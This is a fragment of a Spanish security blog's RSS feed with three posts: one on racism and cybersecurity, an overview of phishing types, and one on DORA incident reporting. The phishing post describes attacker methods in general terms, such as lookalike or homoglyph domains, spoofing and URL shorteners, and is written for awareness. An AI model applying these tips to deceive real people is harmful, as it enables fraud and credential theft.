										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="alignleft size-full is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/06/image.png" alt="" class="wp-image-31035" width="297" height="297" srcset="https://www.securityartwork.es/wp-content/uploads/2023/06/image.png 512w, https://www.securityartwork.es/wp-content/uploads/2023/06/image-300x300.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/06/image-150x150.png 150w" sizes="(max-width: 297px) 100vw, 297px" /><figcaption class="wp-element-caption"><a href="https://deepai.org/machine-learning-model/cyberpunk-generator"><em>Cyberpunk Generator API</em></a></figcaption></figure></div>


<p>Aprovechando la coyuntura, me permito correlacionar la situación actual de aumento del racismo en el deporte con mi ámbito profesional, la ciberseguridad.</p>



<p>En el mundo actual cada vez más interconectado la ciberseguridad se ha convertido en una preocupación primordial, sin embargo, pocos se detienen a considerar la relación entre la ciberseguridad y el racismo. A primera vista, estos dos temas pueden parecer inconexos, pero una mirada más profunda revela una conexión sutil pero importante. En este artículo, trataré de exponer cómo el racismo afecta la ciberseguridad y cómo podemos trabajar para proteger la igualdad en el mundo digital.</p>



<p>El racismo también se manifiesta en forma de ciberacoso y discriminación en la red. Las personas de color son víctimas frecuentes de ataques verbales y de odio en plataformas digitales. Estos ataques no solo tienen un impacto emocional y psicológico en las víctimas, sino que también pueden comprometer su seguridad cibernética. Los acosadores pueden utilizar información personal para llevar a cabo ataques más sofisticados, como el robo de identidad o la suplantación de identidad.</p>



<span id="more-31034"></span>



<p>Por otra parte, los sistemas de inteligencia artificial y aprendizaje automático están cada vez más presentes en nuestras vidas. Sin embargo, estos sistemas no están exentos de sesgos raciales. Los algoritmos utilizados en la inteligencia artificial pueden estar influenciados por prejuicios y estereotipos raciales, lo que lleva a una discriminación algorítmica. Esto puede resultar en la exclusión de personas de color de oportunidades y recursos, así como en la criminalización injusta de ciertos grupos raciales.</p>



<p>Por ello, para abordar la conexión entre la ciberseguridad y el racismo, es fundamental trabajar hacia una protección equitativa. Esto implica garantizar que todas las personas, independientemente de su ascendencia o etnia, tengan acceso a recursos y educación en ciberseguridad. Además, es esencial promover la diversidad en la industria de la ciberseguridad para abordar los sesgos y estereotipos arraigados en los sistemas y algoritmos.</p>



<p>En este sentido, la educación y la conciencia desempeñan un papel crucial en la lucha contra el racismo en el ámbito de la ciberseguridad. Esto implica educar a las personas sobre los riesgos cibernéticos, fomentar una cultura de respeto en la red y promover la inclusión de diferentes perspectivas en la toma de decisiones relacionadas con la seguridad en la red. Al fomentar un entorno en el que todas las personas se sientan seguras y valoradas, podemos combatir tanto el racismo como las amenazas cibernéticas.</p>



<p>Por todo lo anterior, la ciberseguridad y el racismo están más relacionados de lo que podría parecer a simple vista. La desigualdad en el acceso a la tecnología, el ciberacoso racial, los sesgos algorítmicos y la discriminación algorítmica son solo algunos de los aspectos que vinculan estos dos aspectos tan en boga hoy en día.</p>



<p>Al abordar estas cuestiones, podemos trabajar hacia un mundo digital más seguro y equitativo. La protección de la igualdad en el ámbito de la ciberseguridad es esencial para garantizar que todas las personas, sin importar su ascendencia o etnia, puedan disfrutar de los beneficios de la tecnología de manera segura y justa.</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/06/08/racismo-vs-ciberseguridad-protegiendo-la-igualdad-en-el-mundo-digital/">Racismo vs. Ciberseguridad. Protegiendo la igualdad en el mundo digital</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.securityartwork.es/2023/06/08/racismo-vs-ciberseguridad-protegiendo-la-igualdad-en-el-mundo-digital/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Monstruos de río: Phishing</title>
		<link>https://www.securityartwork.es/2023/05/23/monstruos-de-rio-phishing/</link>
					<comments>https://www.securityartwork.es/2023/05/23/monstruos-de-rio-phishing/#respond</comments>
		
		<dc:creator><![CDATA[Adrià Alavedra]]></dc:creator>
		<pubDate>Tue, 23 May 2023 14:53:27 +0000</pubDate>
				<category><![CDATA[General]]></category>
		<guid isPermaLink="false">https://www.securityartwork.es/?p=31021</guid>

					<description><![CDATA[<p>Actualmente, los ataques de ingeniera social son unos de los vectores de entrada más explotados debido a su gran efectividad. Pero ¿qué es el phishing? Entendemos como phishing un ataque de ingeniera social con el objetivo de captar o robar datos privados de los usuarios afectados: nombres de acceso, contraseñas, datos de las tarjetas de [&#8230;]</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/05/23/monstruos-de-rio-phishing/">Monstruos de río: Phishing</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Actualmente, los ataques de ingeniera social son unos de los vectores de entrada más explotados debido a su gran efectividad.</p>



<p>Pero ¿qué es el phishing? Entendemos como phishing un ataque de ingeniera social con el objetivo de captar o robar datos privados de los usuarios afectados: nombres de acceso, contraseñas, datos de las tarjetas de crédito, etc, normalmente mediante el uso de correos electrónicos fraudulentos genéricos.</p>



<p>Veamos a continuación diferentes tipos de phishing y sistemas utilizados por los criminales para este tipo de ataques.</p>



<h2 class="wp-block-heading">Tipos de phishing</h2>



<h3 class="wp-block-heading">Spear Phishing</h3>



<p>Es un tipo de phishing más dirigido, a diferencia del phishing genérico, este normalmente se dirige a un tipo de target específico, como por ejemplo, el administrador de sistemas de una empresa, el encargado de Recursos Humanos o incluso el conserje de un edificio.</p>



<span id="more-31021"></span>



<p>El objetivo del spear phishing es alcanzar únicamente al target definido, por lo que, el tipo de correo electrónico generado, buscara principalmente persuadir a este a través de sus intereses, responsabilidades dentro de una organización o gustos personales.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/05/image-1-740x282.png" alt="" class="wp-image-31023" width="608" height="232" srcset="https://www.securityartwork.es/wp-content/uploads/2023/05/image-1-740x282.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-1-300x114.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-1-768x293.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-1.png 886w" sizes="(max-width: 608px) 100vw, 608px" /><figcaption class="wp-element-caption"><em>Figura 1: Spear phishing a un usuario de Apple</em></figcaption></figure></div>


<h3 class="wp-block-heading">Whaling Phishing</h3>



<p>Similar al spear phishing, debido a que se trata de un ataque mucho más dirigido que un phishing corriente, pero con diferencias entre estos dos últimos.</p>



<p>El whaling busca afectar a personas con responsabilidades en una empresa o organización simulando, normalmente, ser un correo enviado por el CEO o CFO de la empresa o por alguna entidad importante vinculada a la organización. Para llamar la atención de este tipo de usuarios, se suelen utilizar métodos de persuasión más avanzados, como por ejemplo, spoofear el origen del correo para generar confianza en el usuario y que crea que el correo es legítimo, tratar temas sensibles para la empresa o la organización, como procesos judiciales, etc.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/05/image-2-740x435.png" alt="" class="wp-image-31024" width="520" height="306" srcset="https://www.securityartwork.es/wp-content/uploads/2023/05/image-2-740x435.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-2-300x176.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-2-768x451.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-2.png 836w" sizes="(max-width: 520px) 100vw, 520px" /><figcaption class="wp-element-caption"><em>Figura 2: Ejemplo de whaling simulando ser un correo de un CEO</em></figcaption></figure></div>


<h3 class="wp-block-heading">Zombie phishing</h3>



<p>Este proceso de phishing es algo más complejo, ya que requiere de disponer de una cuenta de correo legítima y de confianza para la víctima previamente comprometida.</p>



<p>Este tipo de phishing busca &#8220;reanimar&#8221; una conversación antigua completamente legítima con su víctima, para añadirle una URL maliciosa y persuadir al usuario para que caiga en la trampa.</p>



<p>Al tratarse de una conversación legítima, este tipo de phishing se convierte en uno de los métodos más eficaces, puesto que el usuario dispone de un lazo de confianza con el sender del correo.</p>



<h3 class="wp-block-heading">Smishing</h3>



<p>Este tipo de phishing, a diferencia de los demás, no utiliza el correo electrónico como vector de entrada. El smishing se caracteriza por ser un ataque a través de mensajes SMS.</p>



<p>Estos SMS suelen ser mensajes cortos y concisos, buscando generar el máximo de estrés al usuario para que caiga.</p>



<p>Un ejemplo de smishing podría ser un SMS que simula ser de tu entidad bancaria, informando que tu cuenta ha sido comprometida, y que se requiere que accedas inmediatamente al link del SMS para verificar la información de su cuenta y poder desbloquearla.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/05/image-3.png" alt="" class="wp-image-31025" width="429" height="429" srcset="https://www.securityartwork.es/wp-content/uploads/2023/05/image-3.png 643w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-3-300x300.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-3-150x150.png 150w" sizes="(max-width: 429px) 100vw, 429px" /><figcaption class="wp-element-caption"><em>Figura 3: Ejemplo de Smishing simulando ser una entidad financiera</em></figcaption></figure></div>


<h3 class="wp-block-heading">Vishing</h3>



<p>El vishing, se caracteriza por ser un tipo de phishing que se realiza a través de una llamada de voz, aunque el objetivo final sigue siendo el mismo, adquirir información sensible o corporativa del usuario afectado.</p>



<p>Volviendo al ejemplo anterior, pero enfocado en el vishing, podría tratarse de una llamada telefónica suplantando la identidad de un trabajador de tu entidad bancaria, informando de que tu cuenta ha sido comprometida. De esta forma, el atacante podría solicitar información sensible del usuario para validar que se trata del titular de la cuenta afectada. Este método es muy eficaz para conseguir información como por ejemplo el DNI, fecha de nacimiento del usuario, etc. Gracias a estos datos, un atacante podría generar un diccionario para realizar un posterior ataque de fuerza bruta o incluso para generar un phishing mucho más dirigido y creíble hacia la víctima.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/05/image-4-740x357.png" alt="" class="wp-image-31026" width="448" height="216" srcset="https://www.securityartwork.es/wp-content/uploads/2023/05/image-4-740x357.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-4-300x145.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-4-768x370.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-4.png 873w" sizes="(max-width: 448px) 100vw, 448px" /><figcaption class="wp-element-caption"><em>Figura 4: Fotomontaje simulando la escena de un vishing</em></figcaption></figure></div>


<h3 class="wp-block-heading">Search Phishing</h3>



<p>Este tipo de phishing suele ser utilizado en paralelo con otros tipos de phishing. La idea detrás del search phishing, es utilizar los motores de búsqueda legítimos como Google, para posicionar una web fraudulenta mediante SEO en los primeros resultados de estos motores de búsqueda. El motivo por el cual es un método bastante efectivo, se debe a la confianza que los usuarios tienen sobre estos servicios, por lo que, normalmente, no desconfiara de los resultados obtenidos tras realizar una búsqueda en alguno de estos motores.</p>



<p>Haciendo uso de esta técnica, el atacante puede conseguir que el usuario descargue software malicioso, introduzca sus datos en un formulario malicioso, o que utilice códigos de descuento fraudulento en la compra de un producto popular y conocido.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="740" height="296" src="https://www.securityartwork.es/wp-content/uploads/2023/05/image-5-740x296.png" alt="" class="wp-image-31027" srcset="https://www.securityartwork.es/wp-content/uploads/2023/05/image-5-740x296.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-5-300x120.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-5-768x307.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-5.png 863w" sizes="(max-width: 740px) 100vw, 740px" /><figcaption class="wp-element-caption"><em>Figura 5: Search phishing sobre el dominio blockchain</em></figcaption></figure></div>


<h3 class="wp-block-heading">Angler phishing</h3>



<p>Debido a la extensión del uso de las redes sociales en nuestro día a día para generar lazos de confianza, el Angler phishing busca aprovechar estos nuevos métodos de comunicación para engañar a los usuarios de las redes sociales.</p>



<p>Un atacante podría crear un perfil en Twitter simulando ser una organización, para posteriormente, una vez ha ganado la confianza de los usuarios, generar un post con una URL maliciosa.</p>



<p>Un ejemplo de Angler phishing, podría ser la generación de un perfil falso de una empresa de venta de productos electrónicos, que ofrece a través de sus redes sociales una oferta sobre un producto popular, para que los usuarios accedan a la URL donde se realiza esta oferta e introduzcan sus datos personales.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/05/image-6-740x364.png" alt="" class="wp-image-31028" width="522" height="257" srcset="https://www.securityartwork.es/wp-content/uploads/2023/05/image-6-740x364.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-6-300x147.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-6-768x378.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-6.png 887w" sizes="(max-width: 522px) 100vw, 522px" /><figcaption class="wp-element-caption"><em>Figura 6: Angler phishing suplantando a Paypal</em></figcaption></figure></div>


<h2 class="wp-block-heading">Metodologías</h2>



<p>Estos serían los principales tipos de phishing existentes, pero ¿Qué técnicas utilizan los atacantes para que estos ataques de ingeniera social sean tan efectivos y generen la suficiente confianza en la víctima para que caiga en la trampa?</p>



<p>Existen múltiples técnicas que, combinadas entre ellas, podrían marcar la diferencia entre un phishing efectivo y un phishing mediocre. A continuación, vamos a poner algunos ejemplos de estas técnicas sin entrar en mucho detalle.</p>



<h3 class="wp-block-heading">OSINT</h3>



<p>La primera sería hacer uso de los distintos procesos de OSINT, para obtener el máximo de información pública disponible sobre la entidad, empresa, organización o persona a la que queramos realizarle el phishing.</p>



<p>Esto permitirá al atacante generar un phishing mucho más consistente y con menos margen de error. ¿Quién caería en un phishing de una entidad bancaria de la que nunca ha sido cliente?</p>



<p>Gracias a esto, podríamos llegar a identificar logotipos, localización de una organización, nombre de los empleados, etc. Estos datos podrían ser de gran ayuda a la hora de generar, por ejemplo, una firma de correo corporativa de la empresa a la que se realice el phishing.</p>



<h3 class="wp-block-heading">Dominio</h3>



<p>Adquirir un dominio sobre el que configurar el servicio de correo y enviar el phishing es siempre una buena idea. En muchos casos y dependiendo del tipo de phishing que estemos realizando, puede ser válido e incluso coherente utilizar un correo de hotmail o gmail, aunque en la mayoría de los casos, si queremos realizar un phishing de calidad, es recomendable adquirir un dominio similar al dominio de la empresa u organización sobre la que queramos realizar el ataque.</p>



<p>Esto se podría realizar adquiriendo un dominio igual al de la entidad, pero con un TLD distintos, o incluso, generar un dominio con alguna letra codificada en Unicode que simule una letra del abecedario, y que, a simple vista no es distinguible, como, por ejemplo, utilizar el carácter &#8220;ƿ&#8221; en lugar del carácter &#8220;p&#8221;.</p>



<h3 class="wp-block-heading">Spoofing</h3>



<p>La suplantación de identidad siempre es un buen aliado para generar un phishing consistente, dependiendo del tipo de phishing que estemos generando, se podrá realizar un tipo de suplantación u otra, siempre vinculado a la tecnología que utilicemos. No es lo mismo spoofear el sender de un correo electrónico, a suplantar el caller ID en una llamada telefónica o SMS, estas diferencias están directamente vinculadas al funcionamiento de cada una de las tecnologías que se utilizan para la ejecución del phishing.</p>



<h3 class="wp-block-heading">URL Shortener</h3>



<p>Utilizar un acortador de URL para modificar la url visible en el phishing, de esta forma, se genera un falso estado de confianza en el usuario que recibe el correo electrónico o el SMS. No es lo mismo identificar en el correo una URL de bit.ly, a que, mediante código HTML, a primera vista se identifique el dominio legitimo suplantado mientras que la URL te redirige a la web fraudulenta generada.</p>



<p>Aplicando todas estas metodologías, los cibercriminales han hecho del phishing y los ataques de ingeniera social uno de los vectores más potenciales, por lo que cada vez es un vector más utilizado. Han existido casos muy famosos de phishing como, por ejemplo, el ataque a Paypal en 2003, el ataque a Sony Pictures en 2014 y el ataque a la campaña presidencial de Hillary Clinton en 2016 entre otros.</p>



<p>Para finalizar, os dejamos algunas estadísticas de ataques de phishing de los últimos años:</p>



<ul>
<li>Google bloquea alrededor de 100 millones de correos electrónicos de phishing todos los días.</li>



<li>Para el primer trimestre de 2022, LinkedIn fue la empresa más imitada para los intentos de phishing a nivel mundial. Las empresas más imitadas en el 2022 fueron:<ul><li>LinkedIn (52%)</li></ul><ul><li>DHL (14%)</li></ul><ul><li>Google (7%)</li></ul><ul><li>Microsoft (6%)</li></ul>
<ul>
<li>FedEx (6%)</li>
</ul>
</li>



<li>El 45,56% de los correos electrónicos enviados en 2021 fueron spam.
<ul>
<li>Junio de 2021 tuvo el mayor porcentaje de correos electrónicos no deseados enviados, con un 48,03%.</li>



<li>Noviembre de 2021 tuvo el porcentaje más bajo de correos electrónicos no deseados enviados, con un 43,7%.</li>
</ul>
</li>
</ul>



<ul>
<li>El 24,77% de los correos electrónicos no deseados se enviaron desde Rusia. Otro 14,12% de los correos electrónicos no deseados se enviaron desde Alemania. Los 5 principales países de origen de correos electrónicos no deseados en 2021 fueron:
<ul>
<li>Rusia (24,77%)</li>



<li>Alemania (14,12%)</li>



<li>Estados Unidos (10,46%)</li>



<li>China (8,73%)</li>



<li>Países Bajos (4,75%)</li>
</ul>
</li>
</ul>



<ul>
<li>El 90% de los ataques de phishing enviados a través de aplicaciones de mensajería se envían a través de WhatsApp. El siguiente porcentaje más alto es Telegram, con un 5,04%.</li>
</ul>



<h2 class="wp-block-heading">Referencias</h2>



<ul>
<li><a href="https://aag-it.com/the-latest-phishing-statistics/">https://aag-it.com/the-latest-phishing-statistics/</a></li>



<li><a href="https://docs.apwg.org/reports/apwg_trends_report_q3_2022.pdf">https://docs.apwg.org/reports/apwg_trends_report_q3_2022.pdf</a></li>



<li><a href="https://www.pandasecurity.com/en/mediacenter/tips/types-of-phishing/">https://www.pandasecurity.com/en/mediacenter/tips/types-of-phishing/</a></li>



<li><a href="https://www.fortinet.com/resources/cyberglossary/types-of-phishing-attacks">https://www.fortinet.com/resources/cyberglossary/types-of-phishing-attacks</a></li>
</ul>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/05/23/monstruos-de-rio-phishing/">Monstruos de río: Phishing</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.securityartwork.es/2023/05/23/monstruos-de-rio-phishing/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Marco de notificación de incidentes de ciberseguridad en el Reglamento DORA</title>
		<link>https://www.securityartwork.es/2023/05/11/marco-de-notificacion-de-incidentes-de-ciberseguridad-en-el-reglamento-dora/</link>
		
		<dc:creator><![CDATA[Mónica Alagón]]></dc:creator>
		<pubDate>Thu, 11 May 2023 12:55:16 +0000</pubDate>
				<category><![CDATA[General]]></category>
		<guid isPermaLink="false">https://www.securityartwork.es/?p=31013</guid>

					<description><![CDATA[<p>Es innegable que desde la publicación del Reglamento Europeo sobre la resiliencia operativa digital del sector financiero (DORA) el marco de gestión de riesgos de ciberseguridad de las entidades del sector financiero está sufriendo grandes cambios. Sobre todo, en lo que se refiere a asegurar sus operaciones, cada vez más dependientes de las TIC, lo [&#8230;]</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/05/11/marco-de-notificacion-de-incidentes-de-ciberseguridad-en-el-reglamento-dora/">Marco de notificación de incidentes de ciberseguridad en el Reglamento DORA</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="alignleft size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/05/image-740x387.png" alt="" class="wp-image-31014" width="414" height="216" srcset="https://www.securityartwork.es/wp-content/uploads/2023/05/image-740x387.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-300x157.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/05/image-768x401.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/05/image.png 800w" sizes="(max-width: 414px) 100vw, 414px" /></figure></div>


<p>Es innegable que desde la publicación del Reglamento Europeo sobre la resiliencia operativa digital del sector financiero (DORA) el marco de gestión de riesgos de ciberseguridad de las entidades del sector financiero está sufriendo grandes cambios. Sobre todo, en lo que se refiere a asegurar sus operaciones, cada vez más dependientes de las TIC, lo que ha hecho a este sector muy vulnerable a los problemas que afectan a estas tecnologías, como es el caso de los ciberataques.</p>



<p>Hasta la llegada de DORA, los riesgos cibernéticos que afectaban al sector financiero se abordaban de forma fragmentada. Existían normas generales de aplicación parcial para el sector financiero y normas destinadas al sector financiero que trataban la gestión de riesgos TIC de forma irregular y con cierta incoherencia.</p>



<p>En este entorno, el Reglamento DORA está llamado a unificar y facilitar la aplicación de un marco que permita mantener el pleno control del riesgo relacionado con las TIC. Las entidades financieras necesitan disponer de capacidades globales para realizar una gestión del riesgo tecnológico sólida y eficaz, así como de mecanismos y políticas específicos para gestionar los incidentes relacionados con las TIC y notificar aquellos que sean graves.</p>



<span id="more-31013"></span>



<p>Es concretamente este último: la notificación de los incidentes graves relacionados con las TIC, uno de los pilares del DORA, ya que este Reglamento deberá armonizar y racionalizar la forma de notificación de los incidentes de ciberseguridad, al tiempo que amplía las obligaciones de notificación a todas las entidades financieras.</p>



<p>Hoy en día, las empresas sufren la proliferación de requisitos relacionados con la notificación de incidentes relacionados con las TIC, que se traduce en que deben tener en cuenta múltiples circunstancias, plazos, umbrales y multas asociadas en caso de incumplimiento, lo que dificulta la gestión eficaz de los incidentes relacionados con las TIC.</p>



<p>El DORA debe facilitar el cumplimiento de las obligaciones de notificación, ya que armoniza las plantillas de notificación, así como las condiciones que desencadenan dicha obligación. Condiciones y métodos de notificación a través de los que las empresas de servicios financieros tendrán que proporcionar a sus autoridades nacionales competentes la información necesaria.</p>



<p>Actualmente, las autoridades de supervisión como la EBA, EIOPA, ESMA y el Comité Mixto de Autoridades Supervisoras se encuentran en un proceso de consultas con ENISA para llevar a la práctica un marco armonizado y simplificado para la notificación de incidentes graves relacionados con las TIC. Gracias a este marco, las entidades financieras podrán implementar un proceso de gestión de incidentes relacionados con las TIC que les facilite la detección, gestión y notificación a la autoridad competente de dichos incidentes, a través de una notificación inicial, un informe intermedio y un informe final. Y que además les permitirá notificar a la autoridad competente, con carácter voluntario, las ciberamenazas significativas.</p>



<p>De este modo, el Banco Central Europeo y ENISA están llevando a cabo proyectos para especificar con mayor detalle los parámetros relacionados con los ciberincidentes. Como, por ejemplo, los umbrales de gravedad de los incidentes que están sujetos a la obligación de notificación, los criterios que deben aplicar las autoridades competentes para evaluar la importancia de los incidentes graves, o los umbrales de probabilidad para determinar las ciberamenazas más significativas. En cuanto al contenido de las notificaciones, estos proyectos definirán también los elementos y detalles que deben contener las notificaciones, cuáles son de interés para otros Estados miembros, además de los plazos para la notificación inicial y para el resto de los informes obligatorios, entre otros aspectos.</p>



<p>El periodo de consultas para establecer la clasificación de los incidentes finaliza en enero de 2024, mientras que está previsto que el plazo para definir procedimiento de notificación se extienda hasta junio de ese mismo año. Por tanto, debemos estar atentos a lo que nos trae este nuevo marco de notificación, esperando que la simplificación y unificación de los procedimientos de notificación de incidentes sea una realidad el próximo año.</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/05/11/marco-de-notificacion-de-incidentes-de-ciberseguridad-en-el-reglamento-dora/">Marco de notificación de incidentes de ciberseguridad en el Reglamento DORA</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
